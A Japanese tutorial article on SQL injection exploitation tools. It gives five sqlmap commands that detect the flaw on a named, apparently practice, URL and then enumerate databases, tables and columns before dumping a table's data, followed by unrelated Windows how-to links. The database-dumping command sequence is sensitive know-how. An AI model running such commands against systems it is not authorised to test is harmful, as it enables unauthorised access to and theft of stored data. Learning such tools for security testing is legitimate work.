Home » » Web6: SQL インジェクション - いくつかの悪用ツール

Web6: SQL インジェクション - いくつかの悪用ツール

Web6: SQL インジェクション - いくつかの悪用ツール

このセクションでは、LuckyTemplates がSQL インジェクションを悪用するために使用されるいくつかのツールを紹介します。

現在、多くのセキュリティ脆弱性スキャン ツール (SQL インジェクションを含む) が存在します。これらのツールを使用すると、SQL インジェクションの脆弱性を非常に強力に検出して悪用できます。一般的に使用される自動 SQL インジェクション脆弱性悪用ツールには次のようなものがあります。

  • Sqlmap
  • モグラ (データを掘り起こす)
  • ハヴィジ

Netsparker、jSQL Injection、Burp、BBQSQL など、他にも参照できるツールがいくつかあります。

以下は、Sqlmap を使用して基本的な SQL インジェクションを活用するデモです。

Sqlmap は http://sqlmap.org/ からダウンロードします。

Sqlmap は Python で書かれているため、このツールを使用するには Python をインストールする必要があります。 Python は http://www.python.org/downloads/ からダウンロードできます。

まず、ターゲット Web サイトを特定する必要があります。ここでは、次のターゲットを指定します: http://zerocoolhf.altervista.org/level1.php?id=1 (このページは現在廃止されています)。

ステップ 1 : cmd を開き、次のコマンドを入力します。

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”

Web6: SQL インジェクション - いくつかの悪用ツール

sqlmap はターゲットの脆弱性を検出し、脆弱性に関する情報を提供します。

ステップ 2 : ターゲット Web サイトに SQL インジェクションの脆弱性があると判断したら、データベース名の検索に進みます。

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs

Web6: SQL インジェクション - いくつかの悪用ツール

=> データベース: my_zerocoolhf

ステップ 3 : データベース名を決定した後、データベース内のテーブルの名前を探し続けます。

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf

Web6: SQL インジェクション - いくつかの悪用ツール

=> データベースには 2 つのテーブルがあります: auth と book

ステップ 4 : テーブル内の列の名前を決定する

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book

Web6: SQL インジェクション - いくつかの悪用ツール

=> 書籍テーブルの列を特定します: 著者、ID、価格、タイトル。

ステップ 5 : テーブルからデータをダンプします。

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book

Web6: SQL インジェクション - いくつかの悪用ツール

=> これで、対象のWebサイトのデータベースを取得できました。

上記は、sqlmap を使用して SQL インジェクション エラーを悪用する基本的なデモです。悪用をサポートするための sqlmap オプションの詳細については、https://github.com/sqlmapproject/sqlmap/wiki/Usage で学習できます。SQL インジェクション エクスプロイト。

Tags: #SQL インジェクション #SQL インジェクションの悪用 #ユーザー入力の悪用 #SQL インジェクションの攻撃

Windows 10で欠落しているデフォルトの電源プランを復元する方法

Windows 10で欠落しているデフォルトの電源プランを復元する方法

このガイドでは、Windows 10でデフォルトの電源プラン(バランス、高パフォーマンス、省電力)を復元する方法を詳しく解説します。

Windows 10 で BlueStacks 5 の仮想化 (VT) を有効にする方法

Windows 10 で BlueStacks 5 の仮想化 (VT) を有効にする方法

仮想化を有効にするには、まず BIOS に移動し、BIOS 設定内から仮想化を有効にする必要があります。仮想化を使用することで、BlueStacks 5 のパフォーマンスが大幅に向上します。

WiFi接続に接続する際のドライバーの切断を修正

WiFi接続に接続する際のドライバーの切断を修正

WiFi 接続に接続するときにドライバーが切断されるエラーを修正する方法を解説します。

Windows での DIR コマンドの使用方法

Windows での DIR コマンドの使用方法

DIR コマンドは、特定のフォルダーに含まれるすべてのファイルとサブフォルダーを一覧表示する強力なコマンド プロンプト コマンドです。 Windows での DIR コマンドの使用方法を詳しく見てみましょう。

ソフトウェアを使わずに Windows 10 アプリをバックアップおよび復元する方法

ソフトウェアを使わずに Windows 10 アプリをバックアップおよび復元する方法

ソフトウェアなしで Windows 10 アプリをバックアップし、データを保護する方法を説明します。

Windows でローカル グループ ポリシー エディターを開くための 11 のヒント

Windows でローカル グループ ポリシー エディターを開くための 11 のヒント

Windows のローカル グループ ポリシー エディターを使用して、通知履歴の削除やアカウントロックの設定を行う方法を説明します。

最高の IP 監視ツール 10 選

最高の IP 監視ツール 10 選

重要なリソースを簡単に監視及び管理できる<strong>IP監視</strong>ソフトウェアがあります。これらのツールは、ネットワーク、インターフェイス、アプリケーションのトラフィックをシームレスに確認、分析、管理します。

AxCrypt ソフトウェアを使用してデータを暗号化する方法

AxCrypt ソフトウェアを使用してデータを暗号化する方法

AxCrypt は、データの暗号化に特化した優れたソフトウェアであり、特にデータ セキュリティに優れています。

Windows 10 Creators Updateのアップデート後にシステムフォントを変更する方法

Windows 10 Creators Updateのアップデート後にシステムフォントを変更する方法

システムフォントのサイズを変更する方法は、Windows 10のユーザーにとって非常に便利です。

Windows 10で機内モードをオフにできないエラーを修正する方法

Windows 10で機内モードをオフにできないエラーを修正する方法

最近、Windows 10にアップデートした後、機内モードをオフにできない問題について多くのユーザーから苦情が寄せられています。この記事では、Windows 10で機内モードをオフにできない問題を解決する方法を説明します。